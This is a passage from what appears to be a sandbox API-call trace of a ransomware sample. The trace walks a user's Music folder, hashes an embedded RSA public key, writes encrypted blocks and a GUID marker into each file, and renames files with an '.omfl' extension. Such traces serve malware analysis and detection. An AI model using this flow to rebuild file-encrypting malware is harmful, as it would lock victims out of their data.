KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.175] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.176] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.176] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.176] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.176] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.176] GetLastError () returned 0x0 [0131.176] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.176] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.176] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.176] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.176] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.176] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.176] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.177] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.177] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xe084, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.178] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0131.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0131.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0131.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.178] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.178] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.178] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.178] CloseHandle (hObject=0x5c8) returned 1 [0131.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0131.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0131.181] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DjldUM9FLyiTpuN9GMU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\djldum9flyitpun9gmu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DjldUM9FLyiTpuN9GMU.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\djldum9flyitpun9gmu.mp3.omfl")) returned 1 [0131.185] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.185] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.185] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.187] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.187] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0615610, ftCreationTime.dwHighDateTime=0x1d5d877, ftLastAccessTime.dwLowDateTime=0x9859eba0, ftLastAccessTime.dwHighDateTime=0x1d5e6fa, ftLastWriteTime.dwLowDateTime=0x9859eba0, ftLastWriteTime.dwHighDateTime=0x1d5e6fa, nFileSizeHigh=0x0, nFileSizeLow=0xdfd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EHrGl.m4a", cAlternateFileName="")) returned 1 [0131.187] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.187] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.187] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.187] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EHrGl.m4a") returned=".m4a" [0131.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EHrGl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ehrgl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.187] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=57304) returned 1 [0131.187] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.190] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xdfb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.190] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.191] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.192] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.192] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.192] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xdfd8, lpOverlapped=0x0) returned 1 [0131.192] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.192] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.192] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.192] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.192] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.193] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.193] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.193] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.193] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.193] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.194] GetLastError () returned 0x0 [0131.194] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.194] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.194] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.194] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.194] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.194] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.194] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.194] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.194] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.194] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xdfe0) returned 0xdd35410 [0131.194] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd349c8 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f38 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34a10 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f50 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f80 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f98 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.195] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f80 | out: hHeap=0x4970000) returned 1 [0131.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f98 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16f80 [0131.195] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f80 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.196] GetCurrentThreadId () returned 0x618 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2ce80 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.196] GetCurrentThreadId () returned 0x618 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f80 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0131.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.197] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f98 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f68 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fb0 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f80 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f80 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.198] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f80 | out: hHeap=0x4970000) returned 1 [0131.199] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 